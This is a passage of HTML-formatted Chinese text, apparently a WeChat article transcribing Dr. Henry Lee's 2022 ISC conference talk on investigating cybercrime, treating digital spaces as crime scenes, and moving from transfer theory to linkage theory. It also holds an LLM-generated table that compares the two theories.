Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></p><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">- </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;mso-ansi-language:EN-GB;">Make the impossible possible</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></p><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">- </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;mso-ansi-language:EN-GB;">who are we going to trust</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">？</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></p><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#276296;"> </span>    <o:page></o:page></p><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">大家好，我是李昌钰博士，今天非常高兴能参加 2022 年 ISC 第十届互联网安全大会。谢谢大会的主持人的邀请，跟大家分享我一点意见。</span></section><h2 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 18pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#276296;">互联网安全是世界性的</span>
  </h2><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"><img class="rich_pages wxw-img" data-imgfileid="100000687" data-ratio="0.4922907488986784" data-type="png" data-w="908" height="201.99998474121094" width="410.6700439453125" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=63509512&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxruVLbIyrOy0tpOq8qU5oAXX4kLWh6KibH9Riciaibl9R5wicFecgfRP9Ow7RDOLia1DZqY0NkuzUuCcSg%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></section><p style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">大家都知道互联网的安全不是一个地区或者一个国家的问题，是整个世界性的。据美国统计，全世界大概有100亿设备，这些每年都在增加，而这个安全牵涉到 Cyber crime，不止关于国家的安全，政府的资料的安全，工业的安全，还有个人的安全。</span></p><h2 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 18pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#276296;">网络犯罪是一个很重要的课题</span>
  </h2><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">美国现在有很多的网络犯罪的问题，包括针对国家安全、政府部门、工业、个人、系统、网络、数据、计算机硬件等，所以调查网络犯罪是变成一个很重要的课题。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"><img class="rich_pages wxw-img" data-imgfileid="100000686" data-ratio="0.5349887133182845" data-type="png" data-w="443" height="158.0" width="294.6700134277344" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=4023ae14&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxruVLbIyrOy0tpOq8qU5oApyFFCUxZBJEZgibRIYVaxITQJBX7GxMbTYXX6JCN3cH5och3XsGgSqg%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">我们首先要分开这个定义， </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#FF0000;">e-crime跟 e-war 是两回事情</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">。e-crime 针对着个人或者企业，而 e-war 是针对着国家的安全。还有其他分类。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"><img class="rich_pages wxw-img" data-imgfileid="100000688" data-ratio="0.6711711711711712" data-type="png" data-w="444" height="198.0" width="294.6700134277344" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=2939f76f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxruVLbIyrOy0tpOq8qU5oAqKrWJ6wV5P2CVHko0zLs1P2GYsgO3d39VXYMsTfTJQiaJbF5I7T1HPQ%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></section><p style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">所以我今天要讲的主要是关于怎样调查个人的犯罪，包括信用卡，包括 网络暴力、儿童 pornography 或者其他一系列的。很多人的个人资料被泄露了，在 2021 年，几个 billion 的资料被泄露,e-crime变成一个非常重要的问题。</span>    <o:page></o:page></p><h2 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 18pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#276296;">怎么调查？有什么注意事项？</span>
  </h2><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"><img class="rich_pages wxw-img" data-imgfileid="100000689" data-ratio="0.7472283813747228" data-type="png" data-w="451" height="224.0" width="300.0" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=ac1428bb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxruVLbIyrOy0tpOq8qU5oAqQnaeJr1bKPnOV66t0JOHcN6DV4ibfz0SvXNLyEl4PIqcfOiaib6ojlYA%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></section><p style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">怎么调查？我们通常是先Analyze cyber incident 这个问题怎么来的？然后 follow 的 legal requirement，因为法律上的要求能不能去那提取这些资料？然后 secure the virtual crime scene。现在新的现场的定义已经包括网站也是一个新现场，怎么样去收集、保存、分析人证、物证、电子证据？然后Identify the suspect. Reconstruct 重建电脑的犯罪现场，这样我们将来才能学到以后更多的经验.</span></p><h2 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 18pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#276296;">要将传统的现场，跟电脑的现场结合起来</span>
  </h2><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">所以现场第一步是start<span style="mso-spacerun:yes;">  </span>recognition。什么是现场？</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"><img class="rich_pages wxw-img" data-imgfileid="100000690" data-ratio="0.7438752783964365" data-type="png" data-w="449" height="222.0" width="298.6700134277344" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=513e0356&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxruVLbIyrOy0tpOq8qU5oAx3F8Vdtub5syyPG7zG1U0SPxhmMSHw5SOFic3hoJYqY3voGyMjTpc8Q%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"> </span>    <o:page></o:page></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"><img class="rich_pages wxw-img" data-imgfileid="100000691" data-ratio="0.48672566371681414" data-type="png" data-w="904" height="200.0" width="410.6700439453125" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=5e6e3f36&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxruVLbIyrOy0tpOq8qU5oAAEOwbm2kdAH1UTR6lwNRBekYiaswmsVzW0LeBtvzqUbycF3e70Imdzg%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">现场早期我们的定义就是一个死者或者一个犯罪实地的现场，现在这个现场包括 universal crime scene，好像电脑犯罪，好像手机， 微观物证（microscopic）在手机上面一个毛仿也可能会变成一个现场。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"><img class="rich_pages wxw-img" data-imgfileid="100000692" data-ratio="0.7634408602150538" data-type="png" data-w="465" height="235.99996948242188" width="310.0" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=dcb3eeba&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxruVLbIyrOy0tpOq8qU5oAdzbFqia0iamFIGmvk2scJgW5M9wqTX10iazI1KCbXMXckxOuLQXDqd2HA%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">现场调查在 20世纪以前都是用 transfer theory，就是我们那物证经过接触才留下痕迹，但是 20世纪以后我们的思维方法就有了改变，叫做 linkage theory，你不必直接接触到实物，你也可以找到物证。</span></section><h3 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 13.5pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#3C87CD;">现场调查的思维方法转变</span>
  </h3><h3 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 13.5pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#3C87CD;">从转移理论发展到联系理论</span>
  </h3><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">*LLM分析增补</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">用一个表格来总结和对比转移理论（Transfer Theory）和联系理论（Linkage Theory）的主要特点和异同。</span></section><table border="1" cellspacing="0" cellpadding="0" style="margin-left: 0px;border-width: initial;border-style: none;border-color: initial;border-collapse: collapse;width: 100%;"><tbody><tr><td width="139" valign="top" style="width:102.55pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">特征</span></p></td><td width="197" valign="top" style="width:147.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">转移理论 (Transfer Theory)</span></p></td><td width="189" valign="top" style="width:139.55pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">联系理论 (Linkage Theory)</span></p></td></tr><tr><td width="139" valign="top" style="width:102.55pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">核心概念</span></p></td><td width="197" valign="top" style="width:146.5pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">物质在接触时相互转移</span></p></td><td width="189" valign="top" style="width:141.9pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">证据之间存在多维度的关联</span></p></td></tr><tr><td width="139" valign="top" style="width:102.55pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">理论基础</span></p></td><td width="197" valign="top" style="width:146.5pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">洛卡德交换原理</span></p></td><td width="189" valign="top" style="width:134.4pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">行为一致性、模式识别</span></p></td></tr><tr><td width="139" valign="top" style="width:102.55pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">证据类型</span></p></td><td width="197" valign="top" style="width:146.5pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">主要关注物理证据</span></p></td><td width="189" valign="top" style="width:141.9pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">包括物理、行为和情境证据</span></p></td></tr><tr><td width="139" valign="top" style="width:102.55pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">应用范围</span></p></td><td width="197" valign="top" style="width:146.5pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">单一犯罪现场</span></p></td><td width="189" valign="top" style="width:134.4pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">多个犯罪现场或复杂案件</span></p></td></tr><tr><td width="139" valign="top" style="width:102.55pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">分析焦点</span>        <o:page></o:page></p></td><td width="197" valign="top" style="width:146.5pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">微观层面的物质转移</span></p></td><td width="189" valign="top" style="width:134.4pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">宏观层面的模式和关联</span></p></td></tr><tr><td width="139" valign="top" style="width:102.55pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">时间维度</span></p></td><td width="197" valign="top" style="width:146.5pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">通常关注单一时间点</span></p></td><td width="189" valign="top" style="width:134.4pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">考虑随时间变化的模式</span></p></td></tr><tr><td width="139" valign="top" style="width:102.55pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">证据解释</span></p></td><td width="197" valign="top" style="width:146.5pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">&#34;是什么&#34;和&#34;从哪里来&#34;</span></p></td><td width="189" valign="top" style="width:134.4pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">&#34;为什么&#34;和&#34;如何联系&#34;</span></p></td></tr><tr><td width="139" valign="top" style="width:102.55pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 